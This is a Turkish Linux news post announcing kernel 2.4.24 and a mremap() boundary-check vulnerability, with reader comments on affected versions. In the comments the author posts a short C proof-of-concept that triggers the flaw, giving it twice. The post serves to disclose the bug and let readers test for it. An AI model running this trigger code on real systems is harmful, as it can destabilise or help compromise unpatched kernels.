Kernel 2.4.24 Çıktı

0
bahadirkandemir
bahadirkandemir
6 Ocak 2004 , 1 dakika okuma süresi
Kernel'in bellek yönetim kodunda, mremap(2) sistem çağrısındaki hatalı sınır kontrolünden kaynaklanan bir güvenlik zayıflığı bulundu.

mremap sistem çağrısı, sanal bellek alanlarının adreslenebilir boşluklarını taşımak ve boyutlarını değiştirme imkanı sağlıyor.

Duyurunun tamamı: http://isec.pl/vulnerabilities/isec-0013-mremap.txt
linux
3
Linkedin Facebook Twitter Google plus

Görüşler

bahadirkandemir
0
bahadirkandemir
NOT: Bu zayıflığın 2.2, 2.4 ver 2.6 serilerinde olduğu belirtilmişti ancak, zayıflığı keşfeden güvenlik grubu bu açığın MREMAP_FIXED bayrağını desteklemeyen 2.2 serilerinde olmadığını önemli güvenlik listelerinde duyurdu.

Kernel 2.6.0'da aynı zayıflığın olduğu duyurulmuştu, 2.6.1-rc1'de zayıflığın giderilmediği, 2.6.1-rc2'de giderildiği ek bir açıklama ile duyuruldu.

Zayıflığı test etmek isteyenler aşağıdaki kodu deneyebilir:

#include
#include
#include
#include

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
realist
0
realist
ne #include ediyoruz?
hangi #include ?
bahadirkandemir
0
bahadirkandemir
Sanırım < ve > karakterleri sorun yarattı. 2 kere önizleme yapmamdan kaynaklandı.

----------------------------------------------

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
Görüş belirtmek için giriş yapın...

İlgili Yazılar

Linux Dergisi
Soulblighter
8 Kasım 2003, 1 dakika okuma süresi

Benim gibi dergi okuma hastasıysanız, hele hele Linux dergisi olsa da okusam diyorsanız işte size güzel iki adres...

Birincisi LinuxWorld.com'un çıkarttığı Linux World Magazine.

İkincisi Linux Gazette. 1995'ten beri yayında olan Linux Internet gazetesinin arşivine erişebilir. Linux'un emekleme yıllarındaki gelişmeleri takip edebilirsiniz. Hem nostalji hem de çok ilginç bilgiler var.

OpenSUSE.org Yayında
vst
10 Ağustos 2005, 1 dakika okuma süresi

Daha önceden duyurduğumuz bir haberde Novell'in Suse'nin tüm kaynaklarını açacağını iletmiştik. Bugün Suse haber postalarında http://www.opensuse.org sitesinin yayına girdiği duyuruldu. Son sürümü indirebilirsiniz ve Bugzilla ile hata raporlarınızı iletebilirsiniz.

Busy Box - Minimalist Linux meraklılarına
sundance
6 Ağustos 2001, 1 dakika okuma süresi

Hep merak etmişimdir madem Windows`a alternatif, neden Linux`da devamlı şişiyor diye. Glibc, KDE filan derken dev gibi bir sistem karşımıza çıkıyor. Herşey bir yana temel *nix komutları için bile mblarca yer ve Lib5, Lib6 kullanmamız gerekiyor.

Benzer bir kaygı ile BusyBox ekibi, hemen hemen bütün temel Linux komutlarını tek bir dosyada toplamışlar, hem de UPX`lendikten sonra sadece 130K`a inen bir tek dosyada.

Hangi komutlar mı var bu 130K`nın içinde ? ...

Richard Stallman ile röportaj
anonim
14 Ekim 2009, 1 dakika okuma süresi

Özgür Yazılım Vakfı'nın kurucusu ve GNU projesinin lideri Richard Stallman, telifli yazılımlar, bağımlılık ilişkileri ve okullarda özgür yazılımın önemi konularında bir röportaj verdi.

Linuz balığı. Linux´cular bu tam size göre...
BatoR
26 Haziran 2002, 1 dakika okuma süresi

Şöyle düşünün : Arabanız var, sakin sakin yol alıyorsunuz, yoldan geçenler arabanıza bakıyor; hayranlık, şaşkınlık... Dahası mı?
www.thinkgeek.com :O)